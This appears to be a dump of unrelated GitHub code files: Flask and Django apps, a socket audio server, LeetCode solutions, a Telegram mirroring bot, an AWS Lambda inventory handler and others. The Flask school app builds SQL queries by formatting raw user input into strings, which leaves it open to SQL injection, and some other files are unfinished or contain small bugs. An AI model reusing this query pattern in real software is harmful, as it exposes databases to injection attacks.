self.DEFAULT_PATH_VISUALIZATIONS)\n","repo_name":"rodrigobressan/entity_embeddings_categorical","sub_path":"entity_embeddings/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7772,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"48"} +{"seq_id":"32831744311","text":"from django import forms\n\nSubtopic_Choices = (\n (\"finance\",\"finance\"),\n (\"option2\",\"option2\"),\n (\"option3\",\"option3\"),\n\n)\n\nPrivacy_Choices = (\n ('yes','yes'),\n ('no','no'),\n\n)\n\nclass NLPQueryForm(forms.Form):\n question = forms.CharField()\n document = forms.FileField()\n subtopic = forms.ChoiceField(choices = Subtopic_Choices)\n privacy = forms.ChoiceField(choices = Privacy_Choices, widget=forms.RadioSelect)\n\n ","repo_name":"TNBL265/NLPQueryBot","sub_path":"NLPQueryApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14944871819","text":"from flask import Flask, render_template, session, redirect, request, url_for, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import text\nimport bcrypt\nimport os\n\napp = Flask(__name__)\n\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\n#decorator for unauthorized access\ndef authorize(func):\n def wrapper(*args, **kwargs):\n try:\n session['name'] != None\n except:\n flash(\"Vaše relace vypršela. 
Prosím přihlašte se.\", \"error\")\n return redirect(url_for('login'))\n else:\n return func(*args, **kwargs)\n wrapper.__name__ = func.__name__\n return wrapper\n\n@app.route(\"/\")\ndef index():\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n years = db.engine.execute('SELECT DISTINCT rok FROM pocet_prijatych')\n query = db.engine.execute('SELECT skola.id, skola.nazev, mesto.nazev, obor.nazev, pocet_prijatych.pocet, pocet_prijatych.rok FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id')\n result = []\n for row in query:\n result.append(row)\n return render_template(\"index.html\", data=result, cities=cities, fields=fields, years=years)\n\n@app.route('/addSchool', methods=[\"GET\",\"POST\"])\n@authorize\ndef addSchool():\n if request.method == 'GET':\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n return render_template('add_school.html', fields=fields, cities=cities)\n else:\n school = request.form['school']\n geoLat = request.form['geoLat']\n geoLong = request.form['geoLong']\n city = request.form['city']\n field = request.form['field']\n num_of_accepted = request.form['num_of_accepted']\n year = request.form['year']\n try:\n db.engine.execute(\"INSERT INTO skola (nazev, mesto, geo_lat, geo_long) VALUES ('%s', %s, %s, %s)\" % (school, city, geoLat, geoLong))\n insertedSchoolId = db.engine.execute(\"SELECT id FROM skola WHERE nazev='%s'\" % (school)).first()\n db.engine.execute(\"INSERT INTO pocet_prijatych (obor, skola, pocet, rok) VALUES ('%s', %s, %s, %s)\" % (field, insertedSchoolId[0], num_of_accepted, year))\n\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n print(e)\n flash(\"Při ukládání se vyskytla chyba.\", \"error\")\n return redirect(url_for(\"index\"))\n \n@app.route('/addCity', methods=[\"GET\",\"POST\"])\n@authorize\ndef addCity():\n if request.method == 'GET':\n return render_template('add_city.html')\n else:\n name = request.form['name']\n try:\n db.engine.execute(\"INSERT INTO mesto (nazev) VALUES ('%s')\" % (name))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n except Exception as e:\n flash(\"Při ukládání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n \n\n@app.route('/addField', methods=[\"GET\",\"POST\"])\n@authorize\ndef addField():\n if request.method == 'GET':\n return render_template('add_field.html')\n else:\n name = request.form['name']\n try:\n db.engine.execute(\"INSERT INTO obor (nazev) VALUES ('%s')\" % (name))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n except:\n flash(\"Při ukládání se vyskytl problém.\", \"error\")\n return redirect(url_for(\"index\"))\n\n#route for editing school\n@app.route('/editSchool/', methods=[\"GET\",\"POST\"])\n@authorize\ndef editSchool(id):\n if request.method == 'GET':\n school = db.engine.execute(\"SELECT * FROM skola WHERE id=%s\" % (id)).first()\n fields = db.engine.execute('SELECT * FROM obor')\n cities = db.engine.execute('SELECT * FROM mesto')\n school_join = db.engine.execute('SELECT skola.id, skola.nazev, mesto.nazev, obor.id, obor.nazev, pocet_prijatych.pocet, pocet_prijatych.rok, mesto.id FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id WHERE skola.id=%s' % (id)).first()\n print(school_join)\n 
return render_template('edit_school.html', school=school, school_join=school_join, fields=fields, cities=cities)\n else:\n school_join = db.engine.execute('SELECT obor.id FROM mesto JOIN skola ON mesto.id=skola.mesto JOIN pocet_prijatych ON skola.id=pocet_prijatych.skola JOIN obor ON pocet_prijatych.obor=obor.id WHERE skola.id=%s' % (id)).first()\n school = request.form['school']\n geoLat = request.form['geoLat']\n geoLong = request.form['geoLong']\n city = request.form['city']\n field = request.form['field']\n num_of_accepted = request.form['num_of_accepted']\n year = request.form['year']\n try:\n db.engine.execute(\"UPDATE skola SET nazev='%s', mesto=%s, geo_lat=%s, geo_long=%s WHERE id=%s\" % (school, city, geoLat, geoLong, id))\n db.engine.execute(\"UPDATE pocet_prijatych SET obor=%s, pocet=%s, rok=%s WHERE skola=%s AND obor=%s\" % (field, num_of_accepted, year, id, school_join[0]))\n print(\"UPDATE pocet_prijatych SET obor=%s, pocet=%s, rok=%s WHERE skola=%s AND obor=%s\" % (field, num_of_accepted, year, id, school_join[0]))\n flash(\"Ukládání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n flash(\"Při ukládání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n\n#route for deleting school\n@app.route('/deleteSchool/', methods=[\"GET\"])\n@authorize\ndef deleteSchool(id):\n try:\n db.engine.execute(\"DELETE FROM skola WHERE id=%s\" % (id))\n flash(\"Smazání proběhlo úspěšně.\", \"success\")\n return redirect(url_for(\"index\"))\n except Exception as e:\n flash(\"Při mazání se vyskytl problém.\" + str(e), \"error\")\n return redirect(url_for(\"index\"))\n\n@app.route(\"/map\")\n@authorize\ndef map():\n query = db.engine.execute('SELECT * FROM skola')\n return render_template(\"map.html\", data=query)\n\n@app.route('/register', methods=[\"GET\",\"POST\"])\ndef register():\n if request.method == 'GET':\n return render_template('register.html')\n else:\n username = request.form['username']\n password = request.form['password'].encode('utf-8')\n hash_password = bcrypt.hashpw(password, bcrypt.gensalt())\n try:\n user = db.engine.execute(text(\"SELECT * FROM uzivatele WHERE uzivatelske_jmeno=:username\"),username=username,).first()\n if user == None:\n db.engine.execute(\"INSERT INTO uzivatele (uzivatelske_jmeno, heslo) VALUES (%s, %s)\",(username,hash_password))\n session['name'] = username\n flash(\"Registrace proběhla úspěšně\", \"success\")\n return redirect(url_for(\"index\"))\n else:\n flash(\"Uživatel s tímto jménem již existuje\", \"error\")\n return redirect(url_for(\"register\"))\n except Exception as e:\n print(e)\n return \"chyba\"\n \n\n@app.route(\"/login\", methods=[\"GET\",\"POST\"])\ndef login():\n if request.method == \"POST\":\n username = request.form['username']\n password = request.form['password'].encode('utf-8')\n\n user = db.engine.execute(text(\"SELECT * FROM uzivatele WHERE uzivatelske_jmeno=:username\"),username=username,).first()\n\n if user != None:\n if bcrypt.hashpw(password, user[2].encode('utf-8')) == user[2].encode('utf-8'):\n session['name'] = user[1]\n return redirect(url_for(\"index\"))\n flash(\"Jméno a heslo se neshodují\", \"error\")\n return redirect(url_for(\"login\"))\n else:\n return render_template('login.html')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n return redirect(url_for(\"login\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True, 
threaded=True)","repo_name":"JestrabikR/skoly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33518692441","text":"import socket #socket library\r\nimport wave,pyaudio, pickle,struct #libraries for handling audio\r\nfrom _thread import * #threading library\r\nServerSocket = socket.socket() #create the socket\r\nhost = '127.0.0.1'\r\nport = 2524\r\nBuffer = 1024\r\ntry:\r\n    ServerSocket.bind((host, port)) #bind the socket\r\nexcept socket.error as e:\r\n    print(str(e))\r\nprint('Socket listo')\r\nServerSocket.listen(5)\r\n\r\n#worker function\r\ndef ActividadCliente(connection):\r\n    while True:\r\n        p = pyaudio.PyAudio() #audio handling\r\n        stream = p.open(format=p.get_format_from_width(2), channels=2, rate=44100, output=True, frames_per_buffer=Buffer) #define the constants sent to the audio output ports\r\n        data = b\"\"\r\n        carga = struct.calcsize(\"Q\") #size in bytes of the packed payload-length field\r\n        while True:\r\n            try:\r\n                while len(data) < carga:\r\n                    packet = connection.recv(4 * 1024) # receive good-quality audio\r\n                    if not packet:\r\n                        break\r\n                    data += packet\r\n                paquete_mensaje = data[:carga] #the elements of data up to the payload-length size\r\n                data = data[carga:]\r\n                mensaje_tam = struct.unpack(\"Q\", paquete_mensaje)[0] #unpack the data\r\n                while len(data) < mensaje_tam:\r\n                    data += connection.recv(4 * 1024)\r\n                frame_data = data[:mensaje_tam]\r\n                data = data[mensaje_tam:]\r\n                frame = pickle.loads(frame_data) #convert it back from the binary byte sequence\r\n                stream.write(frame) #write the frame to the output stream\r\n            except:\r\n                break\r\n    connection.close()\r\nwhile True:\r\n    Client, address = ServerSocket.accept() #accept the connection\r\n    print('Cliente: ' + address[0] ) #shows where the client is connecting from\r\n    start_new_thread(ActividadCliente, (Client,)) #start the thread routine\r\nServerSocket.close()","repo_name":"PaoLynch/REDES-2-PRACTICA","sub_path":"Hilos/ServerAud.py","file_name":"ServerAud.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2769428798","text":"def likes(names):\n    name = \"\"\n    if not len(names):\n        name = 'no one likes this'\n    elif len(names) == 1:\n        name = str(names[0] + ' likes this')\n    elif len(names) == 2:\n        name = names[0] + ' and ' + names[1] + ' like this'\n    elif len(names) == 3:\n        name = names[0] + ', ' + names[1] + ' and ' + names[2] + ' like this'\n    else:\n        name = names[0] + ', ' + names[1] + ' and ' + str(len(names)-2) + ' others like this'\n    print(name)\n\n\nlikes(['Max', 'John', 'Mark', 'Tom'])\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BEST ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\ndef likes(names):\n    if len(names) == 0:\n        return \"no one likes this\"\n    elif len(names) == 1:\n        return \"%s likes this\" % names[0]\n    elif len(names) == 2:\n        return \"%s and %s like this\" % (names[0], names[1])\n    elif len(names) == 3:\n        return \"%s, %s and %s like this\" % (names[0], names[1], names[2])\n    else:\n        return \"%s, %s and %s others like this\" % (names[0], names[1], len(names)-2)","repo_name":"nikedmands/python","sub_path":"Learning/Codewars/who_likes_it.py","file_name":"who_likes_it.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"32307280531","text":"import json\n\nimport moto.server as server\n\n\ndef test_ssoadmin_list():\n backend = server.create_backend_app(\"sso-admin\")\n test_client = backend.test_client()\n\n headers = {\n \"X-Amz-Target\": \"SWBExternalService.ListAccountAssignments\",\n \"User-Agent\": (\n \"aws-cli/2.2.47 Python/3.8.8 Linux/5.11.0-44-generic exe\"\n \"/x86_64.ubuntu.20 prompt/off command/sso-admin.list-account-assignments\",\n ),\n }\n data = {\n \"InstanceArn\": \"arn:aws:sso:::instance/ins-aaaabbbbccccdddd\",\n \"AccountId\": \"222222222222\",\n \"PermissionSetArn\": \"arn:aws:sso:::permissionSet/ins-eeeeffffgggghhhh/ps-hhhhkkkkppppoooo\",\n }\n\n resp = test_client.post(\"/\", headers=headers, data=json.dumps(data))\n\n assert resp.status_code == 200\n assert json.loads(resp.data) == {\"AccountAssignments\": []}\n","repo_name":"getmoto/moto","sub_path":"tests/test_ssoadmin/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":7174,"dataset":"github-code","pt":"48"} +{"seq_id":"36975802353","text":"'''\r\n 并查集: 本质就是检测图中是否存在圆环,或者一棵树是否存在环\r\n LeetCode - mid - 684 - 冗余连接\r\n LeetCode - mid - 547 - 朋友圈\r\n LeetCode - mid - 1319 - 连通网络的操作次数\r\n LeetCode - mid - 322 - 重新安排行程\r\n'''\r\n\r\n'''\r\n在本问题中, 树指的是一个连通且无环的无向图。\r\n输入: [[1,2], [1,3], [2,3]]\r\n输出: [2,3]\r\n解释: 给定的无向图为:\r\n 1\r\n / \\\r\n2 - 3\r\n\r\n输入: [[1,2], [2,3], [3,4], [1,4], [1,5]]\r\n输出: [1,4]\r\n解释: 给定的无向图为:\r\n5 - 1 - 2\r\n | |\r\n 4 - 3\r\n'''\r\ndef findRedundantConnection(edges):\r\n root = [i for i in range(len(edges)+1)]\r\n def find(i):\r\n if i != root[i]:\r\n root[i] == find(root[i])\r\n return root[i]\r\n for u,v in edges:\r\n u_parent = find(u)\r\n v_parent = find(v)\r\n if u_parent!= v_parent:\r\n root[v_parent] = u_parent\r\n else:\r\n return [u,v]\r\n\r\ne = [[1,2], [2,3], [3,4], [1,4], [1,5]]\r\nprint(findRedundantConnection(e))\r\n\r\n'''\r\n给定一个 N * N 的矩阵 M,表示班级中学生之间的朋友关系。如果M[i][j] = 1,\r\n表示已知第 i 个和 j 个学生互为朋友关系,否则为不知道。你必须输出所有学生中的已知的朋友圈总数。\r\n\r\n输入:\r\n[[1,1,0],\r\n [1,1,0],\r\n [0,0,1]]\r\n输出:2 \r\n解释:已知学生 0 和学生 1 互为朋友,他们在一个朋友圈。\r\n第2个学生自己在一个朋友圈。所以返回 2 。\r\n'''\r\nclass Union(object):\r\n def find_root(self,x,parent):\r\n # 寻找root\r\n root_x = x\r\n while parent[root_x] != -1:\r\n root_x = parent[root_x]\r\n return root_x\r\n\r\n def union(self,x,y,parent):\r\n # 合并x,y节点\r\n root_x = self.find_root(x,parent)\r\n root_y = self.find_root(y,parent)\r\n if root_x!= root_y:\r\n parent[root_y] = root_x\r\n return parent\r\n\r\n def findCircleNum(self,M):\r\n n = len(M)\r\n parent = [-1]*n\r\n for i in range(n):\r\n for j in range(n):\r\n if m[i][j] == 1:\r\n parent = self.union(i,j,parent)\r\n circle = set()\r\n for i in range(n):\r\n root = self.find_root(i,parent)\r\n circle.add(root)\r\n return len(circle)\r\n\r\nm = [[1,1,0],[1,1,0],[0,0,1]]\r\nu = Union()\r\nprint(u.findCircleNum(m))\r\n\r\n'''\r\n请你计算并返回使所有计算机都连通所需的最少操作次数。如果不可能,则返回 -1 。\r\n输入:n = 4, connections = [[0,1],[0,2],[1,2]]\r\n输出:1\r\n解释:拔下计算机 1 和 2 之间的线缆,并将它插到计算机 1 和 3 上。\r\n\r\n输入:n = 6, connections = [[0,1],[0,2],[0,3],[1,2],[1,3]]\r\n输出:2\r\n'''\r\ndef makeConnected(n,connections):\r\n p = [-1]*(n)\r\n for i in range(n):\r\n p[i] = i\r\n\r\n def find(i):\r\n if p[i] != i :\r\n p[i] = find(p[i])\r\n return p[i]\r\n\r\n res = 0\r\n for u,v in connections:\r\n if find(u) == find(v):\r\n res+=1\r\n else:\r\n p[find(v)] = find(u)\r\n n-=1\r\n n-=1\r\n if res 1:\n main_processor = main_processor_parts[1].strip()\n\n elif 'اندازه صفحه نمایش' in 
text:\n display_size_match = re.search(r'\\d+', text)\n if display_size_match:\n display_size = int(display_size_match.group())\n\n elif text.startswith('حافظه پردازنده گرافیکی') or text.startswith('حافظه گرافیکی:'):\n if 'بدون' not in text:\n graphics_memory_match = re.search(r'\\d+', text)\n if graphics_memory_match:\n graphics_memory = int(graphics_memory_match.group()) \n elif 'بدون' in text:\n graphics_memory = 0 \n\n elif 'پردازنده گرافیکی' in text:\n graphics_processor_parts = text.split(':')\n if len(graphics_processor_parts) > 1:\n graphics_processor = graphics_processor_parts[1].strip()\n\n elif 'وزن' in text:\n weight_match = re.search(r'\\d+\\.\\d+', text)\n if weight_match:\n weight = float(weight_match.group())\n\n elif 'رزولوشن' in text or text.startswith('دقت'):\n resolution_parts = text.split(':')\n if len(resolution_parts) > 1:\n resolution = resolution_parts[1].strip()\n\n elif text.startswith('ظرفیت باتری') or text.startswith('باتری:'):\n battery_capacity_match = re.search(r'\\d+', text)\n if battery_capacity_match:\n battery_capacity = int(battery_capacity_match.group())\n\n try:\n # Insert the laptop details into the database\n cursor.execute('''INSERT INTO asus \n (model, price, storage_capacity, ram_capacity, main_processor, \n display_size, graphics_processor, graphics_memory, weight, resolution, battery_capacity)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''',\n (model, price, storage_capacity, ram_capacity, main_processor, display_size,\n graphics_processor, graphics_memory, weight, resolution, battery_capacity))\n cnx.commit()\n except mysql.connector.IntegrityError as e:\n # Handle duplicate entry error\n if 'Duplicate entry' in str(e):\n print(\"Duplicate product:\", model)\n else:\n print(\"Error:\", str(e))\n\ncursor.close()\ncnx.close()\n","repo_name":"saranri77/WebScrapping","sub_path":"data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5653267587","text":"from telethon import TelegramClient, events\nimport telebot\n\n#брать с сайта телеграмма https://my.telegram.org/auth\napi_id = ''\napi_hash = ''\n\nclient = TelegramClient('mirror', api_id, api_hash)\n\n#брать из botFather\nbot = telebot.TeleBot('')\nclient.start()\n\n#id чата, из которого нужно миррорить\n@client.on(events.NewMessage(-1111111111111))\nasync def main1(event):\n sender = await event.get_sender()\n who = \"Пишет \" + sender.first_name + \": \"\n\n #id чата куда мирорить\n bot.send_message(-111111111111, who)\n bot.send_message(-111111111111, event.message)\n\nclient.run_until_disconnected()\n\n","repo_name":"GilgameshH0/telegram-mirror","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12449816062","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom notes.models import Note\n\nUser = get_user_model()\n\n\nclass TestRoutes(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.author = User.objects.create(username='Автор')\n cls.reader = User.objects.create(username='Другой автор')\n cls.note = Note.objects.create(title='Заголовок',\n text='Текст',\n author=cls.author)\n\n def test_pages_availability(self):\n urls = (\n 'notes:home',\n 'users:login',\n 'users:logout',\n 
'users:signup',\n )\n for name in urls:\n with self.subTest(name=name):\n url = reverse(name)\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_pages_availability_for_auth_client(self):\n urls = (\n 'notes:add',\n 'notes:success',\n 'notes:list',\n )\n for name in urls:\n self.client.force_login(self.author)\n with self.subTest(name=name):\n url = reverse(name)\n response = self.client.get(url)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_availability_for_note__edit_delete_detail(self):\n users_statuses = (\n (self.author, HTTPStatus.OK),\n (self.reader, HTTPStatus.NOT_FOUND),\n )\n for user, status in users_statuses:\n self.client.force_login(user)\n for name in ('notes:edit', 'notes:delete', 'notes:detail'):\n with self.subTest(user=user, name=name):\n url = reverse(name, kwargs={'slug': self.note.slug})\n response = self.client.get(url)\n self.assertEqual(response.status_code, status)\n\n def test_pages_redirect(self):\n login_url = reverse('users:login')\n urls = (\n ('notes:add', None),\n ('notes:success', None),\n ('notes:list', None),\n ('notes:delete', {'slug': self.note.slug}),\n ('notes:edit', {'slug': self.note.slug}),\n ('notes:detail', {'slug': self.note.slug}),\n )\n for name, kwargs in urls:\n with self.subTest(name=name):\n url = reverse(name, kwargs=kwargs)\n redirect_url = f'{login_url}?next={url}'\n response = self.client.get(url)\n self.assertRedirects(response, redirect_url)\n","repo_name":"V1sl3t/django_testing","sub_path":"ya_note/notes/tests/test_routes.py","file_name":"test_routes.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18679592580","text":"\"\"\"\nStructure utilities.\n\"\"\"\n\nimport src.constants as constants\n\ndef replace_service_name(structure: dict, service_name: str) -> None:\n \"\"\"\n Replace the service name in the structure.\n \"\"\"\n for key, value in structure.copy().items():\n if isinstance(value, dict):\n replace_service_name(value, service_name)\n else:\n formatted_key = key.replace(constants.SERVICE_NAME_REPLACEMENT, service_name)\n structure[formatted_key] = structure.pop(key, value)\n\n\ndef add_init_files_to_structure(structure: dict) -> None:\n \"\"\"\n Add the __init__.py files to the structure.\n \"\"\"\n for value in structure.values():\n if isinstance(value, dict):\n add_init_files_to_structure(value)\n structure[constants.INIT_FILE] = \"\"\n","repo_name":"DoMo-98/microservice_setup","sub_path":"src/utils/structure_utils.py","file_name":"structure_utils.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75148540624","text":"import json\nimport os\nimport boto3\nimport logging\nimport random\nimport math\nfrom custom_encoder import Customer_Encoder\nfrom flowers import build_flower_id\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\ndb = boto3.resource('dynamodb')\nclient = boto3.client('dynamodb')\nFLOWER_INVENTORY_TABLE_NAME = os.environ[\"INVENTORY_TABLE\"]\nTRANSACTION_TABLE_NAME = os.environ[\"TRANSACTION_TABLE\"]\n\n# methods and paths\nPUT_METHOD = \"PUT\"\nPATCH_METHOD = \"PATCH\"\nSALE_PATH = \"/sale\"\nPURCHASE_PATH = \"/purchase\"\n\n# function to update inventory and record sale\ndef flower_transaction_func(event, context):\n\n response = {}\n\n # information from API request\n logger.info(event)\n http_method = 
event['httpMethod']\n    path = event['path']\n    request_body = json.loads(event['body'])\n\n    # common information for both paths\n    transactionId = round(random.random()*10000)\n\n    # initial information for \"total\" flower information\n    total_flowers = 0\n    total_flower_types = 0\n    total_price = 0\n    valid_sale = True  # will change to false if there is not enough inventory\n\n    # flower loop will run for both paths\n    for flower in request_body:\n        total_flower_types += 1\n        total_flowers += flower['quantity']\n        total_price += flower['quantity'] * flower['price']\n\n        flower_id = build_flower_id(flower)\n\n        current_quantity = get_flower_quantity(flower_id)\n\n        # will only affect the result of the 'sale' path\n        if flower['quantity'] > current_quantity:\n            valid_sale = False\n\n        if path == PURCHASE_PATH:\n            update_quantity(flower_id, flower['quantity'])\n        elif path == SALE_PATH:\n            update_quantity(flower_id, -1 * flower['quantity'])\n\n\n    # makes sure the combination of method and path is supported\n    if http_method == PUT_METHOD and path == PURCHASE_PATH:\n\n        # writes the summary information to the transaction table\n        transaction_response = write_to_transaction_table(transactionId, total_flower_types, total_flowers, total_price, \"purchase\")\n\n        for flower in request_body:\n            flower_id = build_flower_id(flower)\n\n            # gets current quantity of the flower\n            current_quantity = get_flower_quantity(flower_id)\n\n            # calculates new total\n\n\n            # records updated inventory to table\n\n        # update inventory table\n\n\n    # loop over json elements of flowers\n\n\n    elif http_method == PATCH_METHOD and path == SALE_PATH:\n\n        transaction_response = write_to_transaction_table(transactionId, total_flower_types, total_flowers, total_price, \"sale\")\n\n\n\n    # if event[\"httpMethod\"] != \"GET\":\n    #     raise Exception(f\"getAllItems only accept GET method, you tried: {event.httpMethod}\")\n\n    # data = client.scan(TableName=os.environ[\"INVENTORY_TABLE\"])\n    # items = data[\"Items\"]\n    # response = {\n    #     \"statusCode\": 200,\n    #     \"body\": json.dumps(items)\n    # }\n\n    return response\n\ndef write_to_transaction_table(transaction_id, total_flower_types, total_flowers, total_price, sale_purchase = \"sale\"):\n\n    # writes new item to transaction table\n    response = client.update_item(\n        TableName = TRANSACTION_TABLE_NAME,\n        Key = {\n            'transaction_id': {\n                'S': str(transaction_id)\n            }\n        },\n        ExpressionAttributeNames = {\n            '#F': 'total_flower_types',\n            '#T': 'total_flowers',\n            '#P': 'total_price',\n            '#S': 'sale_purchase'\n        },\n        ExpressionAttributeValues = {\n            ':f': {\n                'N': str(total_flower_types)\n            },\n            ':t': {\n                'N': str(total_flowers)\n            },\n            ':p': {\n                'N': str(total_price)\n            },\n            ':s': {\n                'S': sale_purchase\n            }\n        },\n        ReturnValues = 'ALL_NEW',\n        UpdateExpression = 'SET #F = :f, #T = :t, #P = :p, #S = :s'\n    )\n\n    return response\n\ndef update_inventory_table(flower_id, quantity, sale_purchase):\n\n    response = {}\n    # search for the item in the table\n\n    # calculate new total\n\n    # write new information to the table\n\n    # return the response\n\n    return response\n\ndef get_flower_quantity(flower_id):\n    try:\n        response = client.get_item(\n            TableName = FLOWER_INVENTORY_TABLE_NAME,\n            Key = {\n                'flower_id' : {\n                    'S': flower_id\n                }\n            }\n        )\n\n    except:\n        return None\n\n    # low-level client responses nest the item under 'Item' and type tags\n    return int(response['Item']['quantity']['N'])\n\n# separate function to simplify code\n# to subtract from current total, make the quantity negative\ndef update_quantity(flower_id, quantity):\n    response = client.update_item(\n        TableName = FLOWER_INVENTORY_TABLE_NAME,\n        Key = {\n            'flower_id': {\n                'S': flower_id\n            }\n        },\n        ExpressionAttributeNames = {\n            '#QTY': 'quantity'\n        },\n        ExpressionAttributeValues = {\n            ':q': {\n                'N': str(quantity)\n            }\n        },\n        UpdateExpression = 'ADD #QTY :q'\n    )","repo_name":"murraycoding/AWS_Code","sub_path":"serverless-inventory-system/src/handlers/update_inventory.py","file_name":"update_inventory.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"31033433642","text":"from returing.nn_old.operation import Operation\nfrom returing.nn_old.tensor import Tensor\nfrom returing.nn_old.utils import safe_read_dict\n\nimport numpy as np\nnp.random.seed(20170430)\n\n\nclass Sliding2D(Operation):\n    # Composite Unary Operation\n\n    def __init__(self, **kwargs):\n        super(Sliding2D, self).__init__()\n\n        self.width_idx = safe_read_dict(kwargs, 'width_idx', 0)\n        self.height_idx = safe_read_dict(kwargs, 'height_idx', 0)\n        self.kernel_size = safe_read_dict(kwargs, 'kernel_size', 1)\n        self.stride = safe_read_dict(kwargs, 'stride', 1)\n\n    def forward(self, *args):\n        \"\"\"\n        # Input\n        X: [n_samples, width, height] (Padded Size)\n        width_idx,\n        height_idx,\n        kernel_size,\n        stride\n\n        # Output\n        Y_pred: [n_samples, K, K], kernel_size * kernel_size\n        Y_pred = X[:, W_i*S:W_i*S+K, H_i*S:H_i*S+K]\n\n        Y_pred = X [:, width_idx * stride : width_idx * stride + kernel_size,\n            height_idx * stride : height_idx * stride + kernel_size]\n\n        \"\"\"\n\n        assert len(args) == 1\n        assert isinstance(args[0], Tensor)\n        assert isinstance(args[0].data, np.ndarray)\n        assert len(args[0].data.shape) == 3\n\n        X = args[0]\n        self.X = X # 1.Save input tensors for current function\n\n        Y_pred_data = self.X.data[:, self.width_idx * self.stride :\n            self.width_idx * self.stride + self.kernel_size,\n            self.height_idx * self.stride :\n            self.height_idx * self.stride + self.kernel_size]\n\n        Y_pred = Tensor(Y_pred_data)\n        Y_pred.grad_fn = self # 3. Set grad_fn & requires_grad for current function\n        if self.X.requires_grad:\n            Y_pred.requires_grad = True\n\n        Y_pred.left_child = X # 4. Set parent-child relationships.\n        X.parent = Y_pred\n\n        return Y_pred # 2. 
Return new Tensor\n\n    def backward(self, grad_out=None):\n        \"\"\"\n        grad_out: [n_samples, K, K], np.ndarray\n\n        X: [n_samples, width, height], np.ndarray\n        Modify the gradient of X[n_samples, W_i*S:W_i*S+K, H_i*S:H_i*S+K],\n        not the entire X\n        \"\"\"\n        assert isinstance(self.X, Tensor)\n\n        if not self.X.requires_grad:\n            return\n\n        assert isinstance(self.X.data, np.ndarray)\n        assert len(self.X.data.shape) == 3\n\n        W_i = self.width_idx\n        H_i = self.height_idx\n        S = self.stride\n        K = self.kernel_size\n        n_samples = self.X.data.shape[0]\n\n        # For sliding function, the gradient is 1.\n        cur_grad = np.ones((n_samples, self.kernel_size, self.kernel_size))\n\n        if not isinstance(grad_out, np.ndarray):\n            grad_out = np.ones((n_samples, K, K))\n\n        assert cur_grad.shape == grad_out.shape\n\n        cur_grad *= grad_out\n\n        if isinstance(self.X.grad, np.ndarray):\n            # In numpy `*` is element-wise multiply\n            self.X.grad[:, W_i*S:W_i*S+K, H_i*S:H_i*S+K]\\\n                += cur_grad\n        else:\n            self.X.grad = np.zeros(self.X.data.shape)\n            self.X.grad[:, W_i * S:W_i * S + K, H_i * S:H_i * S + K] = cur_grad","repo_name":"feynmanma7/machine_learning","sub_path":"returing/returing/nn_old/operation/base/slide.py","file_name":"slide.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
